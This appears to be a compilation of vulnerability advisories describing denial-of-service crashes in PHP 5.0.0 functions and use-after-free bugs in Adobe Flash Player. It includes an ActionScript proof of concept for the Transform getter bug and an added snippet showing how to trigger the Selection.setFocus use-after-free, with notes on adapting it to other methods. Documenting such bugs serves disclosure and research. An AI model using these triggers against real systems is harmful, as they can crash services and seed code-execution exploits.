This exploit causes a denial of service in PHP 5.0.0 when the fbird_connect() or fbird_pconnect() functions are called with a string of 9999 'A' characters. This exploit was tested on Windows Server 2012 R2 64bit, English, PHP 5.0.0.
This exploit causes a denial of service in PHP 5.0.0 when the snmpwalkoid() function is called with a string of 9999 'A's. This exploit was tested on Windows Server 2012 R2 64bit, English, PHP 5.0.0.
This exploit causes a denial of service in PHP 5.0.0 when the html_doc_file() function is passed a string of 9999 'A's. This exploit was tested on Windows Server 2012 R2 64bit, English, PHP 5.0.0. The bug was discovered by Yakir Wizman.
This exploit causes a local denial of service in PHP 5.0.0. It requires the domxml extension to be loaded. Calling hw_docbyanchor() with both parameters set to 0 triggers the denial of service.
This exploit causes a denial of service in PHP 5.0.0 when the imap_mail() function is called with a string of 9999 'A's as the first parameter.
There is a use-after-free in the MovieClip Transform getter. If the Transform constructor is replaced with a getter using addProperty, this getter can free the MovieClip before it is accessed. A minimal PoC is as follows:

    var mc = this.createEmptyMovieClip("mc", 1);
    var tf = flash.geom.Transform;
    var g = flash.geom;
    g.addProperty("Transform", func, func);
    mc.f = ASnative(900, 419);
    mc.f();
    function func(){
        mc.removeMovieClip(); // Fix heap
    }
A use-after-free vulnerability exists in the BitmapData.copyPixels method of Adobe Flash Player. If the method is called with a MovieClip as its this object, and that MovieClip is deleted while the parameters are being converted, the freed MovieClip is still used to convert the remaining parameters. This can lead to arbitrary code execution.
Several methods in Flash return instances of the Rectangle class. There is a use-after-free in creating these objects for return. If the this object of the call is a MovieClip, the Rectangle instantiation runs on that MovieClip's thread. If a getter is added to the class's package (flash.geom), it is invoked when the Rectangle constructor is fetched; the getter can free the method's thread, so the Rectangle constructor then runs on a thread that has already been freed.
When the setter is called, the parameter is converted to a string early, as part of the new use-after-free prevention changes. This conversion can invoke script, and if the this object is a MovieClip, that script can delete the object, which also deletes the thread the call is being made from, leading to a use-after-free.
There is a use-after-free in Selection.setFocus. It is a static method, but if it is called with a this object, it runs on that object's thread. If it then calls into script, for example by calling toString on the string parameter, the object and its thread can be deleted, and a use-after-free occurs.
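The copyPixels, setter, Rectangle and Selection.setFocus entries above share one pattern: a native method runs on the thread of a MovieClip used as its this object, a parameter conversion calls back into script, and that script removes the MovieClip out from under the running call. The following ActionScript 2 snippet is an added illustration of that pattern as the text describes it for Selection.setFocus; it is not the original PoC for any of these entries and has not been verified against a particular Flash Player build. The helper names (mc, bad, trigger) are assumptions chosen for this example.

```actionscript
// Added example of the "delete the this object during parameter
// conversion" pattern described above. Not the original PoC.

// The MovieClip that will serve as the this object of the call.
var mc = this.createEmptyMovieClip("mc", 1);

// An object whose string conversion runs script: when the native
// method converts its parameter to a string, toString is invoked and
// removes the MovieClip whose thread the call is executing on.
var bad = new Object();
bad.toString = function() {
    mc.removeMovieClip(); // frees the this object mid-call
    return "x";
};

// Bind the static Selection.setFocus to the MovieClip so that the
// call executes on mc's thread rather than as a plain static call.
mc.trigger = Selection.setFocus;

// The parameter is converted to a string inside the native method;
// the conversion deletes mc and its thread while the call is still
// running on that thread.
mc.trigger(bad);
```

The same shape applies to the other entries: replace Selection.setFocus with the method in question (a Rectangle-returning method, or a setter that stringifies its argument early) and keep the script-invoking conversion on the object whose callback removes the MovieClip. Whether the freed memory is reused in an exploitable way depends on the heap state at the time of the call, which is why the PoC earlier on this page comments on fixing up the heap.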